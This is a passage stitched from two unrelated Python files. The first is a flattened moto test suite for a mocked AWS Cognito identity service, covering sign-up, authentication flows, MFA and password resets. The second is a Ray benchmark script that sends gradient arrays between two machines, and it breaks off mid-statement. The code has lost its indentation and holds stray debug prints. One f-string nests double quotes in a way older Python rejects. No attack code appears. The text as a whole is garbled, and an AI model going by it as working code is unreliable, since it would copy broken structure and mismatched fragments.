test_admin_user_global_sign_out_unknown_user(): conn = boto3.client("cognito-idp", "us-west-2") result = user_authentication_flow(conn) with pytest.raises(ClientError) as ex: conn.admin_user_global_sign_out( UserPoolId=result["user_pool_id"], Username="n/a", ) err = ex.value.response["Error"] err["Code"].should.equal("UserNotFoundException") err["Message"].should.equal("User does not exist.") @mock_cognitoidp def test_admin_update_user_attributes(): conn = boto3.client("cognito-idp", "us-west-2") username = str(uuid.uuid4()) user_pool_id = conn.create_user_pool(PoolName=str(uuid.uuid4()))["UserPool"]["Id"] conn.admin_create_user( UserPoolId=user_pool_id, Username=username, UserAttributes=[ {"Name": "family_name", "Value": "Doe"}, {"Name": "given_name", "Value": "John"}, ], ) conn.admin_update_user_attributes( UserPoolId=user_pool_id, Username=username, UserAttributes=[ {"Name": "family_name", "Value": "Doe"}, {"Name": "given_name", "Value": "Jane"}, ], ) user = conn.admin_get_user(UserPoolId=user_pool_id, Username=username) attributes = user["UserAttributes"] attributes.should.be.a(list) for attr in attributes: val = attr["Value"] if attr["Name"] == "family_name": val.should.equal("Doe") elif attr["Name"] == "given_name": val.should.equal("Jane") @mock_cognitoidp def test_admin_delete_user_attributes(): conn = boto3.client("cognito-idp", "us-east-1") username = str(uuid.uuid4()) user_pool_id = conn.create_user_pool( PoolName=str(uuid.uuid4()), Schema=[ { "Name": "foo", "AttributeDataType": "String", "Mutable": True, "Required": False, } ], )["UserPool"]["Id"] conn.admin_create_user( UserPoolId=user_pool_id, Username=username, UserAttributes=[ {"Name": "family_name", "Value": "Doe"}, {"Name": "given_name", "Value": "John"}, {"Name": "nickname", "Value": "Joe"}, {"Name": "custom:foo", "Value": "bar"}, ], ) conn.admin_delete_user_attributes( UserPoolId=user_pool_id, Username=username, UserAttributeNames=["nickname", "custom:foo"], ) user = conn.admin_get_user(UserPoolId=user_pool_id, Username=username) user["UserAttributes"].should.have.length_of(3) # family_name, given_name and sub user["UserAttributes"].should.contain({"Name": "family_name", "Value": "Doe"}) user["UserAttributes"].should.contain({"Name": "given_name", "Value": "John"}) user["UserAttributes"].should_not.contain({"Name": "nickname", "Value": "Joe"}) user["UserAttributes"].should_not.contain({"Name": "custom:foo", "Value": "bar"}) @mock_cognitoidp def test_admin_delete_user_attributes_non_existing_attribute(): conn = boto3.client("cognito-idp", "us-east-1") username = str(uuid.uuid4()) user_pool_id = conn.create_user_pool(PoolName=str(uuid.uuid4()))["UserPool"]["Id"] conn.admin_create_user( UserPoolId=user_pool_id, Username=username, UserAttributes=[ {"Name": "family_name", "Value": "Doe"}, {"Name": "given_name", "Value": "John"}, {"Name": "nickname", "Value": "Joe"}, ], ) with pytest.raises(ClientError) as exc: conn.admin_delete_user_attributes( UserPoolId=user_pool_id, Username=username, UserAttributeNames=["nickname", "custom:foo"], ) err = exc.value.response["Error"] err["Code"].should.equal("InvalidParameterException") err["Message"].should.equal( "Invalid user attributes: user.custom:foo: Attribute does not exist in the schema.\n" ) @mock_cognitoidp def test_admin_delete_user_attributes_non_existing_user(): conn = boto3.client("cognito-idp", "us-east-1") username = str(uuid.uuid4()) user_pool_id = conn.create_user_pool(PoolName=str(uuid.uuid4()))["UserPool"]["Id"] with pytest.raises(ClientError) as exc: conn.admin_delete_user_attributes( UserPoolId=user_pool_id, Username=username, UserAttributeNames=["nickname", "custom:foo"], ) err = exc.value.response["Error"] err["Code"].should.equal("UserNotFoundException") err["Message"].should.equal("User does not exist.") @mock_cognitoidp def test_admin_delete_user_attributes_non_existing_pool(): conn = boto3.client("cognito-idp", "us-east-1") user_pool_id = "us-east-1_aaaaaaaa" with pytest.raises(ClientError) as exc: conn.admin_delete_user_attributes( UserPoolId=user_pool_id, Username=str(uuid.uuid4()), UserAttributeNames=["nickname"], ) err = exc.value.response["Error"] err["Code"].should.equal("ResourceNotFoundException") err["Message"].should.equal(f"User pool {user_pool_id} does not exist.") @mock_cognitoidp def test_resource_server(): client = boto3.client("cognito-idp", "us-west-2") name = str(uuid.uuid4()) res = client.create_user_pool(PoolName=name) user_pool_id = res["UserPool"]["Id"] identifier = "http://localhost.localdomain" name = "local server" scopes = [ {"ScopeName": "app:write", "ScopeDescription": "write scope"}, {"ScopeName": "app:read", "ScopeDescription": "read scope"}, ] res = client.create_resource_server( UserPoolId=user_pool_id, Identifier=identifier, Name=name, Scopes=scopes ) res["ResourceServer"]["UserPoolId"].should.equal(user_pool_id) res["ResourceServer"]["Identifier"].should.equal(identifier) res["ResourceServer"]["Name"].should.equal(name) res["ResourceServer"]["Scopes"].should.equal(scopes) with pytest.raises(ClientError) as ex: client.create_resource_server( UserPoolId=user_pool_id, Identifier=identifier, Name=name, Scopes=scopes ) ex.value.operation_name.should.equal("CreateResourceServer") ex.value.response["Error"]["Code"].should.equal("InvalidParameterException") ex.value.response["Error"]["Message"].should.equal( "%s already exists in user pool %s." % (identifier, user_pool_id) ) ex.value.response["ResponseMetadata"]["HTTPStatusCode"].should.equal(400) @mock_cognitoidp def test_sign_up(): conn = boto3.client("cognito-idp", "us-west-2") user_pool_id = conn.create_user_pool(PoolName=str(uuid.uuid4()))["UserPool"]["Id"] client_id = conn.create_user_pool_client( UserPoolId=user_pool_id, ClientName=str(uuid.uuid4()), )["UserPoolClient"]["ClientId"] username = str(uuid.uuid4()) password = str(uuid.uuid4()) result = conn.sign_up(ClientId=client_id, Username=username, Password=password) result["UserConfirmed"].should.be.false result["UserSub"].should_not.be.none @mock_cognitoidp def test_sign_up_with_username_attributes(): conn = boto3.client("cognito-idp", "us-west-2") user_pool_id = conn.create_user_pool( PoolName=str(uuid.uuid4()), UsernameAttributes=["email", "phone_number"] )["UserPool"]["Id"] client_id = conn.create_user_pool_client( UserPoolId=user_pool_id, ClientName=str(uuid.uuid4()), )["UserPoolClient"]["ClientId"] username = str(uuid.uuid4()) password = str(uuid.uuid4()) with pytest.raises(ClientError) as err: # Attempt to add user again result = conn.sign_up(ClientId=client_id, Username=username, Password=password) err.value.response["Error"]["Code"].should.equal("InvalidParameterException") username = "test@example.com" result = conn.sign_up(ClientId=client_id, Username=username, Password=password) result["UserConfirmed"].should.be.false result["UserSub"].should_not.be.none username = "+123456789" result = conn.sign_up(ClientId=client_id, Username=username, Password=password) result["UserConfirmed"].should.be.false result["UserSub"].should_not.be.none @mock_cognitoidp def test_sign_up_existing_user(): conn = boto3.client("cognito-idp", "us-west-2") user_pool_id = conn.create_user_pool(PoolName=str(uuid.uuid4()))["UserPool"]["Id"] client_id = conn.create_user_pool_client( UserPoolId=user_pool_id, ClientName=str(uuid.uuid4()), )["UserPoolClient"]["ClientId"] username = str(uuid.uuid4()) password = str(uuid.uuid4()) # Add initial user conn.sign_up(ClientId=client_id, Username=username, Password=password) with pytest.raises(ClientError) as err: # Attempt to add user again conn.sign_up(ClientId=client_id, Username=username, Password=password) err.value.response["Error"]["Code"].should.equal("UsernameExistsException") @mock_cognitoidp def test_confirm_sign_up(): conn = boto3.client("cognito-idp", "us-west-2") username = str(uuid.uuid4()) password = str(uuid.uuid4()) user_pool_id = conn.create_user_pool(PoolName=str(uuid.uuid4()))["UserPool"]["Id"] client_id = conn.create_user_pool_client( UserPoolId=user_pool_id, ClientName=str(uuid.uuid4()), GenerateSecret=True, )["UserPoolClient"]["ClientId"] conn.sign_up(ClientId=client_id, Username=username, Password=password) conn.confirm_sign_up( ClientId=client_id, Username=username, ConfirmationCode="123456", ) result = conn.admin_get_user(UserPoolId=user_pool_id, Username=username) result["UserStatus"].should.equal("CONFIRMED") @mock_cognitoidp def test_confirm_sign_up_with_username_attributes(): conn = boto3.client("cognito-idp", "us-west-2") username = "test@example.com" password = str(uuid.uuid4()) user_pool_id = conn.create_user_pool( PoolName=str(uuid.uuid4()), UsernameAttributes=["email"] )["UserPool"]["Id"] client_id = conn.create_user_pool_client( UserPoolId=user_pool_id, ClientName=str(uuid.uuid4()), GenerateSecret=True, )["UserPoolClient"]["ClientId"] conn.sign_up(ClientId=client_id, Username=username, Password=password) conn.confirm_sign_up( ClientId=client_id, Username=username, ConfirmationCode="123456", ) result = conn.admin_get_user(UserPoolId=user_pool_id, Username=username) result["UserStatus"].should.equal("CONFIRMED") @mock_cognitoidp def test_initiate_auth_USER_SRP_AUTH(): conn = boto3.client("cognito-idp", "us-west-2") username = str(uuid.uuid4()) password = str(uuid.uuid4()) user_pool_id = conn.create_user_pool(PoolName=str(uuid.uuid4()))["UserPool"]["Id"] client_id = conn.create_user_pool_client( UserPoolId=user_pool_id, ClientName=str(uuid.uuid4()), GenerateSecret=True, )["UserPoolClient"]["ClientId"] conn.sign_up(ClientId=client_id, Username=username, Password=password) client_secret = conn.describe_user_pool_client( UserPoolId=user_pool_id, ClientId=client_id, )["UserPoolClient"]["ClientSecret"] conn.confirm_sign_up( ClientId=client_id, Username=username, ConfirmationCode="123456", ) key = bytes(str(client_secret).encode("latin-1")) msg = bytes(str(username + client_id).encode("latin-1")) new_digest = hmac.new(key, msg, hashlib.sha256).digest() secret_hash = base64.b64encode(new_digest).decode() result = conn.initiate_auth( ClientId=client_id, AuthFlow="USER_SRP_AUTH", AuthParameters={ "USERNAME": username, "SRP_A": uuid.uuid4().hex, "SECRET_HASH": secret_hash, }, ) result["ChallengeName"].should.equal("PASSWORD_VERIFIER") @mock_cognitoidp def test_initiate_auth_USER_SRP_AUTH_with_username_attributes(): conn = boto3.client("cognito-idp", "us-west-2") username = "test@example.com" password = str(uuid.uuid4()) user_pool_id = conn.create_user_pool( PoolName=str(uuid.uuid4()), UsernameAttributes=["email"] )["UserPool"]["Id"] client_id = conn.create_user_pool_client( UserPoolId=user_pool_id, ClientName=str(uuid.uuid4()), GenerateSecret=True, )["UserPoolClient"]["ClientId"] conn.sign_up(ClientId=client_id, Username=username, Password=password) client_secret = conn.describe_user_pool_client( UserPoolId=user_pool_id, ClientId=client_id, )["UserPoolClient"]["ClientSecret"] conn.confirm_sign_up( ClientId=client_id, Username=username, ConfirmationCode="123456", ) key = bytes(str(client_secret).encode("latin-1")) msg = bytes(str(username + client_id).encode("latin-1")) new_digest = hmac.new(key, msg, hashlib.sha256).digest() secret_hash = base64.b64encode(new_digest).decode() result = conn.initiate_auth( ClientId=client_id, AuthFlow="USER_SRP_AUTH", AuthParameters={ "USERNAME": username, "SRP_A": uuid.uuid4().hex, "SECRET_HASH": secret_hash, }, ) result["ChallengeName"].should.equal("PASSWORD_VERIFIER") @mock_cognitoidp def test_initiate_auth_REFRESH_TOKEN(): conn = boto3.client("cognito-idp", "us-west-2") result = user_authentication_flow(conn) result = conn.initiate_auth( ClientId=result["client_id"], AuthFlow="REFRESH_TOKEN", AuthParameters={ "REFRESH_TOKEN": result["refresh_token"], "SECRET_HASH": result["secret_hash"], }, ) result["AuthenticationResult"]["AccessToken"].should_not.be.none @mock_cognitoidp def test_initiate_auth_USER_PASSWORD_AUTH(): conn = boto3.client("cognito-idp", "us-west-2") result = user_authentication_flow(conn) result = conn.initiate_auth( ClientId=result["client_id"], AuthFlow="USER_PASSWORD_AUTH", AuthParameters={"USERNAME": result["username"], "PASSWORD": result["password"]}, ) result["AuthenticationResult"]["AccessToken"].should_not.be.none result["AuthenticationResult"]["IdToken"].should_not.be.none result["AuthenticationResult"]["RefreshToken"].should_not.be.none @mock_cognitoidp def test_initiate_auth_USER_PASSWORD_AUTH_user_not_found(): conn = boto3.client("cognito-idp", "us-west-2") result = user_authentication_flow(conn) with pytest.raises(ClientError) as ex: conn.initiate_auth( ClientId=result["client_id"], AuthFlow="USER_PASSWORD_AUTH", AuthParameters={"USERNAME": "INVALIDUSER", "PASSWORD": result["password"]}, ) err = ex.value.response["Error"] err["Code"].should.equal("UserNotFoundException") @mock_cognitoidp def test_initiate_auth_USER_PASSWORD_AUTH_user_incorrect_password(): conn = boto3.client("cognito-idp", "us-west-2") result = user_authentication_flow(conn) with pytest.raises(ClientError) as ex: conn.initiate_auth( ClientId=result["client_id"], AuthFlow="USER_PASSWORD_AUTH", AuthParameters={ "USERNAME": result["username"], "PASSWORD": "NotAuthorizedException", }, ) err = ex.value.response["Error"] err["Code"].should.equal("NotAuthorizedException") @mock_cognitoidp def test_initiate_auth_USER_PASSWORD_AUTH_unconfirmed_user(): conn = boto3.client("cognito-idp", "us-west-2") username = str(uuid.uuid4()) password = str(uuid.uuid4()) user_pool_id = conn.create_user_pool(PoolName=str(uuid.uuid4()))["UserPool"]["Id"] client_id = conn.create_user_pool_client( UserPoolId=user_pool_id, ClientName=str(uuid.uuid4()), GenerateSecret=True, )["UserPoolClient"]["ClientId"] conn.sign_up(ClientId=client_id, Username=username, Password=password) with pytest.raises(ClientError) as ex: conn.initiate_auth( ClientId=client_id, AuthFlow="USER_PASSWORD_AUTH", AuthParameters={"USERNAME": username, "PASSWORD": password}, ) err = ex.value.response["Error"] err["Code"].should.equal("UserNotConfirmedException") @mock_cognitoidp def test_initiate_auth_for_unconfirmed_user(): conn = boto3.client("cognito-idp", "us-west-2") username = str(uuid.uuid4()) password = str(uuid.uuid4()) user_pool_id = conn.create_user_pool(PoolName=str(uuid.uuid4()))["UserPool"]["Id"] client_id = conn.create_user_pool_client( UserPoolId=user_pool_id, ClientName=str(uuid.uuid4()), GenerateSecret=True, )["UserPoolClient"]["ClientId"] conn.sign_up(ClientId=client_id, Username=username, Password=password) client_secret = conn.describe_user_pool_client( UserPoolId=user_pool_id, ClientId=client_id, )["UserPoolClient"]["ClientSecret"] key = bytes(str(client_secret).encode("latin-1")) msg = bytes(str(username + client_id).encode("latin-1")) new_digest = hmac.new(key, msg, hashlib.sha256).digest() secret_hash = base64.b64encode(new_digest).decode() caught = False try: conn.initiate_auth( ClientId=client_id, AuthFlow="USER_SRP_AUTH", AuthParameters={ "USERNAME": username, "SRP_A": uuid.uuid4().hex, "SECRET_HASH": secret_hash, }, ) except conn.exceptions.UserNotConfirmedException: caught = True caught.should.be.true @mock_cognitoidp def test_initiate_auth_with_invalid_secret_hash(): conn = boto3.client("cognito-idp", "us-west-2") username = str(uuid.uuid4()) password = str(uuid.uuid4()) user_pool_id = conn.create_user_pool(PoolName=str(uuid.uuid4()))["UserPool"]["Id"] client_id = conn.create_user_pool_client( UserPoolId=user_pool_id, ClientName=str(uuid.uuid4()), GenerateSecret=True, )["UserPoolClient"]["ClientId"] conn.sign_up(ClientId=client_id, Username=username, Password=password) conn.describe_user_pool_client(UserPoolId=user_pool_id, ClientId=client_id) conn.confirm_sign_up( ClientId=client_id, Username=username, ConfirmationCode="123456", ) invalid_secret_hash = str(uuid.uuid4()) caught = False try: conn.initiate_auth( ClientId=client_id, AuthFlow="USER_SRP_AUTH", AuthParameters={ "USERNAME": username, "SRP_A": uuid.uuid4().hex, "SECRET_HASH": invalid_secret_hash, }, ) except conn.exceptions.NotAuthorizedException: caught = True caught.should.be.true @mock_cognitoidp def test_setting_mfa(): conn = boto3.client("cognito-idp", "us-west-2") for auth_flow in ["ADMIN_NO_SRP_AUTH", "ADMIN_USER_PASSWORD_AUTH"]: result = authentication_flow(conn, auth_flow) conn.associate_software_token(AccessToken=result["access_token"]) conn.verify_software_token( AccessToken=result["access_token"], UserCode="123456" ) conn.set_user_mfa_preference( AccessToken=result["access_token"], SoftwareTokenMfaSettings={"Enabled": True, "PreferredMfa": True}, ) result = conn.admin_get_user( UserPoolId=result["user_pool_id"], Username=result["username"] ) result["UserMFASettingList"].should.have.length_of(1) @mock_cognitoidp def test_setting_mfa_when_token_not_verified(): conn = boto3.client("cognito-idp", "us-west-2") for auth_flow in ["ADMIN_NO_SRP_AUTH", "ADMIN_USER_PASSWORD_AUTH"]: result = authentication_flow(conn, auth_flow) conn.associate_software_token(AccessToken=result["access_token"]) caught = False try: conn.set_user_mfa_preference( AccessToken=result["access_token"], SoftwareTokenMfaSettings={"Enabled": True, "PreferredMfa": True}, ) except conn.exceptions.InvalidParameterException: caught = True caught.should.be.true @mock_cognitoidp def test_respond_to_auth_challenge_with_invalid_secret_hash(): conn = boto3.client("cognito-idp", "us-west-2") result = user_authentication_flow(conn) valid_secret_hash = result["secret_hash"] invalid_secret_hash = str(uuid.uuid4()) challenge = conn.initiate_auth( ClientId=result["client_id"], AuthFlow="USER_SRP_AUTH", AuthParameters={ "USERNAME": result["username"], "SRP_A": uuid.uuid4().hex, "SECRET_HASH": valid_secret_hash, }, ) challenge = conn.respond_to_auth_challenge( ClientId=result["client_id"], ChallengeName=challenge["ChallengeName"], ChallengeResponses={ "PASSWORD_CLAIM_SIGNATURE": str(uuid.uuid4()), "PASSWORD_CLAIM_SECRET_BLOCK": challenge["Session"], "TIMESTAMP": str(uuid.uuid4()), "USERNAME": result["username"], }, ) caught = False try: conn.respond_to_auth_challenge( ClientId=result["client_id"], Session=challenge["Session"], ChallengeName=challenge["ChallengeName"], ChallengeResponses={ "SOFTWARE_TOKEN_MFA_CODE": "123456", "USERNAME": result["username"], "SECRET_HASH": invalid_secret_hash, }, ) except conn.exceptions.NotAuthorizedException: caught = True caught.should.be.true @mock_cognitoidp def test_admin_set_user_password(): conn = boto3.client("cognito-idp", "us-west-2") username = str(uuid.uuid4()) value = str(uuid.uuid4()) password = str(uuid.uuid4()) user_pool_id = conn.create_user_pool(PoolName=str(uuid.uuid4()))["UserPool"]["Id"] conn.admin_create_user( UserPoolId=user_pool_id, Username=username, UserAttributes=[{"Name": "thing", "Value": value}], ) conn.admin_set_user_password( UserPoolId=user_pool_id, Username=username, Password=password, Permanent=True ) result = conn.admin_get_user(UserPoolId=user_pool_id, Username=username) result["Username"].should.equal(username) result["UserAttributes"].should.have.length_of(2) def _verify_attribute(name, v): attr = [a for a in result["UserAttributes"] if a["Name"] == name] attr.should.have.length_of(1) attr[0]["Value"].should.equal(v) _verify_attribute("thing", value) @mock_cognitoidp def test_change_password_with_invalid_token_raises_error(): client = boto3.client("cognito-idp", "us-west-2") with pytest.raises(ClientError) as ex: client.change_password( AccessToken=str(uuid.uuid4()), PreviousPassword="previous_password", ProposedPassword="newer_password", ) ex.value.response["Error"]["Code"].should.equal("NotAuthorizedException") @mock_cognitoidp def test_confirm_forgot_password_with_non_existent_client_id_raises_error(): client = boto3.client("cognito-idp", "us-west-2") with pytest.raises(ClientError) as ex: client.confirm_forgot_password( ClientId="non-existent-client-id", Username="not-existent-username", ConfirmationCode=str(uuid.uuid4()), Password=str(uuid.uuid4()), ) ex.value.response["Error"]["Code"].should.equal("ResourceNotFoundException") @mock_cognitoidp def test_admin_reset_password_and_change_password(): client = boto3.client("cognito-idp", "us-west-2") username = str(uuid.uuid4()) temporary_pass = str(uuid.uuid4()) # Create pool and client user_pool_id = client.create_user_pool(PoolName=str(uuid.uuid4()))["UserPool"]["Id"] client_id = client.create_user_pool_client( UserPoolId=user_pool_id, ClientName=str(uuid.uuid4()), GenerateSecret=True, )["UserPoolClient"]["ClientId"] # Create CONFIRMED user with verified email client.admin_create_user( UserPoolId=user_pool_id, Username=username, TemporaryPassword=temporary_pass ) client.confirm_sign_up( ClientId=client_id, Username=username, ConfirmationCode="123456" ) client.admin_update_user_attributes( UserPoolId=user_pool_id, Username=username, UserAttributes=[{"Name": "email_verified", "Value": "true"}], ) # User should be in RESET_REQUIRED state after reset client.admin_reset_user_password(UserPoolId=user_pool_id, Username=username) result = client.admin_get_user(UserPoolId=user_pool_id, Username=username) result["UserStatus"].should.equal("RESET_REQUIRED") # Return to CONFIRMED status after NEW_PASSWORD_REQUIRED auth challenge auth_result = client.admin_initiate_auth( UserPoolId=user_pool_id, ClientId=client_id, AuthFlow="ADMIN_NO_SRP_AUTH", AuthParameters={"USERNAME": username, "PASSWORD": temporary_pass}, ) password = "Admin123!" auth_result = client.respond_to_auth_challenge( Session=auth_result["Session"], ClientId=client_id, ChallengeName="NEW_PASSWORD_REQUIRED", ChallengeResponses={"USERNAME": username, "NEW_PASSWORD": password}, ) result = client.admin_get_user(UserPoolId=user_pool_id, Username=username) result["UserStatus"].should.equal("CONFIRMED") # Return to CONFIRMED after user-initated password change client.admin_reset_user_password(UserPoolId=user_pool_id, Username=username) client.change_password( AccessToken=auth_result["AuthenticationResult"]["AccessToken"], PreviousPassword=password, ProposedPassword="Admin1234!", ) result = client.admin_get_user(UserPoolId=user_pool_id, Username=username) result["UserStatus"].should.equal("CONFIRMED") @mock_cognitoidp def test_admin_reset_password_disabled_user(): client = boto3.client("cognito-idp", "us-west-2") username = str(uuid.uuid4()) # Create pool user_pool_id = client.create_user_pool(PoolName=str(uuid.uuid4()))["UserPool"]["Id"] # Create disabled user client.admin_create_user( UserPoolId=user_pool_id, Username=username, TemporaryPassword=str(uuid.uuid4()) ) client.admin_disable_user(UserPoolId=user_pool_id, Username=username) with pytest.raises(ClientError) as ex: client.admin_reset_user_password(UserPoolId=user_pool_id, Username=username) err = ex.value.response["Error"] err["Code"].should.equal("NotAuthorizedException") err["Message"].should.equal("User is disabled") @mock_cognitoidp def test_admin_reset_password_unconfirmed_user(): client = boto3.client("cognito-idp", "us-west-2") username = str(uuid.uuid4()) # Create pool user_pool_id = client.create_user_pool(PoolName=str(uuid.uuid4()))["UserPool"]["Id"] # Create user in status FORCE_CHANGE_PASSWORD client.admin_create_user( UserPoolId=user_pool_id, Username=username, TemporaryPassword=str(uuid.uuid4()) ) with pytest.raises(ClientError) as ex: client.admin_reset_user_password(UserPoolId=user_pool_id, Username=username) err = ex.value.response["Error"] err["Code"].should.equal("NotAuthorizedException") err["Message"].should.equal("User password cannot be reset in the current state.") @mock_cognitoidp def test_admin_reset_password_no_verified_notification_channel(): client = boto3.client("cognito-idp", "us-west-2") username = str(uuid.uuid4()) # Create pool and client user_pool_id = client.create_user_pool(PoolName=str(uuid.uuid4()))["UserPool"]["Id"] client_id = client.create_user_pool_client( UserPoolId=user_pool_id, ClientName=str(uuid.uuid4()), GenerateSecret=True, )["UserPoolClient"]["ClientId"] # Create CONFIRMED user without verified email or phone client.admin_create_user( UserPoolId=user_pool_id, Username=username, TemporaryPassword=str(uuid.uuid4()) ) client.confirm_sign_up( ClientId=client_id, Username=username, ConfirmationCode="123456" ) with pytest.raises(ClientError) as ex: client.admin_reset_user_password(UserPoolId=user_pool_id, Username=username) err = ex.value.response["Error"] err["Code"].should.equal("InvalidParameterException") err["Message"].should.equal( "Cannot reset password for the user as there is no registered/verified email or phone_number" ) @mock_cognitoidp def test_admin_reset_password_multiple_invocations(): client = boto3.client("cognito-idp", "us-west-2") username = str(uuid.uuid4()) # Create pool and client user_pool_id = client.create_user_pool(PoolName=str(uuid.uuid4()))["UserPool"]["Id"] client_id = client.create_user_pool_client( UserPoolId=user_pool_id, ClientName=str(uuid.uuid4()), GenerateSecret=True, )["UserPoolClient"]["ClientId"] # Create CONFIRMED user with verified email client.admin_create_user( UserPoolId=user_pool_id, Username=username, TemporaryPassword=str(uuid.uuid4()) ) client.confirm_sign_up( ClientId=client_id, Username=username, ConfirmationCode="123456" ) client.admin_update_user_attributes( UserPoolId=user_pool_id, Username=username, UserAttributes=[{"Name": "email_verified", "Value": "true"}], ) for _ in range(3): try: client.admin_reset_user_password(UserPoolId=user_pool_id, Username=username) user = client.admin_get_user(UserPoolId=user_pool_id, Username=username) user["UserStatus"].should.equal("RESET_REQUIRED") except ClientError: pytest.fail("Shouldn't throw error on consecutive invocations") # Test will retrieve public key from cognito.amazonaws.com/.well-known/jwks.json, # which isnt mocked in ServerMode if not settings.TEST_SERVER_MODE: @mock_cognitoidp def test_idtoken_contains_kid_header(): # https://github.com/spulec/moto/issues/3078 # Setup cognito = boto3.client("cognito-idp", "us-west-2") user_pool_id = cognito.create_user_pool(PoolName=str(uuid.uuid4()))["UserPool"][ "Id" ] client = cognito.create_user_pool_client( UserPoolId=user_pool_id, ExplicitAuthFlows=[ "ALLOW_ADMIN_USER_PASSWORD_AUTH", "ALLOW_REFRESH_TOKEN_AUTH", "ALLOW_ADMIN_NO_SRP_AUTH", ], AllowedOAuthFlows=["code", "implicit"], ClientName=str(uuid.uuid4()), CallbackURLs=["https://example.com"], ) client_id = client["UserPoolClient"]["ClientId"] username = str(uuid.uuid4()) temporary_password = "1TemporaryP@ssword" cognito.admin_create_user( UserPoolId=user_pool_id, Username=username, TemporaryPassword=temporary_password, ) result = cognito.admin_initiate_auth( UserPoolId=user_pool_id, ClientId=client_id, AuthFlow="ADMIN_NO_SRP_AUTH", AuthParameters={"USERNAME": username, "PASSWORD": temporary_password}, ) # A newly created user is forced to set a new password # This sets a new password and logs the user in (creates tokens) password = "1F@kePassword" result = cognito.respond_to_auth_challenge( Session=result["Session"], ClientId=client_id, ChallengeName="NEW_PASSWORD_REQUIRED", ChallengeResponses={"USERNAME": username, "NEW_PASSWORD": password}, ) # id_token = result["AuthenticationResult"]["IdToken"] # Verify the KID header is present in the token, and corresponds to the KID supplied by the public JWT verify_kid_header(id_token) def verify_kid_header(token): """Verifies the kid-header is corresponds with the public key""" headers = jwt.get_unverified_headers(token) kid = headers["kid"] key_index = -1 keys = fetch_public_keys() for i in range(len(keys)): if kid == keys[i]["kid"]: key_index = i break if key_index == -1: raise Exception("Public key (kid) not found in jwks.json") def fetch_public_keys(): keys_url = "https://cognito-idp.{}.amazonaws.com/{}/.well-known/jwks.json".format( "us-west-2", "someuserpoolid" ) response = requests.get(keys_url).json() return response["keys"]
#!/usr/bin/env python # # Example of two process Ray program, worker sends values to parameter # server on a different machine # # Run locally: # ./ray_two_machines.py # # Run on AWS: # ./ray_two_machines.py --aws # Example timings # c5.18xlarge over network: over network: 63.0 ms: 1586.76 MB/second # c5.9xlarge over network: 399/400 added 100 MBs in 85.5 ms: 1170.26 MB/second # c5.18xlarge locally: 86 ms, 1218 MB/seconds (9.7 Gbps) # macbook pro locally: 978.9 ms, 102.15 MB/second # c5.18xlarge # 004/11 sent 100 MBs in 69.4 ms: 1440.31 MB/second # 005/11 sent 100 MBs in 68.1 ms: 1468.95 MB/second # 006/11 sent 100 MBs in 70.4 ms: 1421.40 MB/second # 007/11 sent 100 MBs in 69.5 ms: 1438.62 MB/second # 008/11 sent 100 MBs in 66.4 ms: 1506.90 MB/second # 009/11 sent 100 MBs in 76.5 ms: 1306.92 MB/second # 010/11 sent 100 MBs in 66.8 ms: 1497.64 MB/second # min: 66.36, median: 69.43, mean: 70.55 # Another run # 989/1000 sent 100 MBs in 54.6 ms: 1831.07 MB/second # 990/1000 sent 100 MBs in 54.4 ms: 1837.20 MB/second # 991/1000 sent 100 MBs in 54.8 ms: 1824.91 MB/second # 992/1000 sent 100 MBs in 53.4 ms: 1874.39 MB/second # 993/1000 sent 100 MBs in 53.1 ms: 1881.77 MB/second # 994/1000 sent 100 MBs in 52.7 ms: 1897.76 MB/second # 995/1000 sent 100 MBs in 55.4 ms: 1805.42 MB/second # 996/1000 sent 100 MBs in 53.4 ms: 1872.93 MB/second # 997/1000 sent 100 MBs in 52.7 ms: 1896.65 MB/second # 998/1000 sent 100 MBs in 54.0 ms: 1851.14 MB/second # 999/1000 sent 100 MBs in 53.6 ms: 1864.93 MB/second # min: 51.11, median: 55.45, mean: 60.74 # Bottom line: 30ms locally, 60ms over network import argparse import os import socket import subprocess import time import numpy as np import ray import util parser = argparse.ArgumentParser() parser.add_argument("--role", default='launcher', type=str, help="launcher/driver") parser.add_argument('--image', default='Deep Learning AMI (Ubuntu) Version 15.0') parser.add_argument("--size-mb", default=100, type=int, help='how much data to send at each iteration') parser.add_argument("--iters", default=11, type=int) parser.add_argument("--aws", action="store_true", help="enable to run on AWS") parser.add_argument("--xray", default=1, type=int, help="whether to use XRay backend") parser.add_argument('--nightly', default=1, type=int, help='whether to use nightly version') parser.add_argument('--name', default='ray_two_machines', type=str, help='name of the run') parser.add_argument("--ip", default='', type=str, help="internal flag, used to point worker to head node") args = parser.parse_args() dim = args.size_mb * 250 * 1000 @ray.remote(resources={"worker": 1}) class Worker(object): def __init__(self): self.gradients = np.ones(dim, dtype=np.float32) def compute_gradients(self): return self.gradients def ip(self): return ray.services.get_node_ip_address() @ray.remote(resources={"ps": 1}) class ParameterServer(object): def __init__(self): self.params = np.zeros(dim, dtype=np.float32) def receive(self, grad): self.params = grad # use = just to get network overhead return self.params def get_weights(self): return self.params def ip(self): return ray.services.get_node_ip_address() def run_launcher(): import ncluster if args.aws: ncluster.set_backend('aws') if args.nightly: # running locally MacOS print(f"asdfasdf {util.ossystem("uname")}") if 'Darwin' in util.ossystem('uname') and not args.aws: install_script = 'pip install -U https://s3-us-west-2.amazonaws.com/ray-wheels/latest/ray-0.5.2-cp36-cp36m-macosx_10_6_intel.whl' print(f"asdfasdf got install script {install_script}") else: install_script = 'pip install -U https://s3-us-west-2.amazonaws.com/ray-wheels/latest/ray-0.5.2-cp36-cp36m-manylinux1_x86_64.whl' else: install_script = 'pip install ray' job = ncluster.make_job(name=args.name, install_script=install_script, image_name=args.image, num_tasks=2) ps, worker = job.tasks if not ncluster.running_locally(): ps._run_raw('killall python', ignore_errors=True) worker._run_raw('killall python', ignore_errors=True) job.upload(__file__) job.upload('util.py') if args.xray: job.run('export RAY_USE_XRAY=1') job.run('ray stop') # https://ray.readthedocs.io/en/latest/resources.html?highlight=resources ps_resource = """--resources='{"ps": 1}'""" worker_resource = """--resources='{"worker": 1}'""" ps.run(f"ray start --head {ps_resource} --redis-port=6379") worker.run(f"ray start --redis-address={ps.ip}:6379 {worker_resource}") worker.run( f'./{__file__} --role=driver --ip={ps.ip}:6379 --size-mb={args.size_mb} --iters={args.iters}') print(worker.read('out')) def run_driver(): ray.init(redis_address=args.ip) worker = Worker.remote() ps = ParameterServer.remote() log = util.FileLogger('out') log(f"Worker ip {ray.get(worker.ip.remote())}") log(f"PS ip {ray.get(ps.ip.remote())}") log(f"Driver ip {socket.gethostbyname(socket.gethostname())}") time_list = [] for i in range(args.iters): start_time = time.perf_counter() grads = 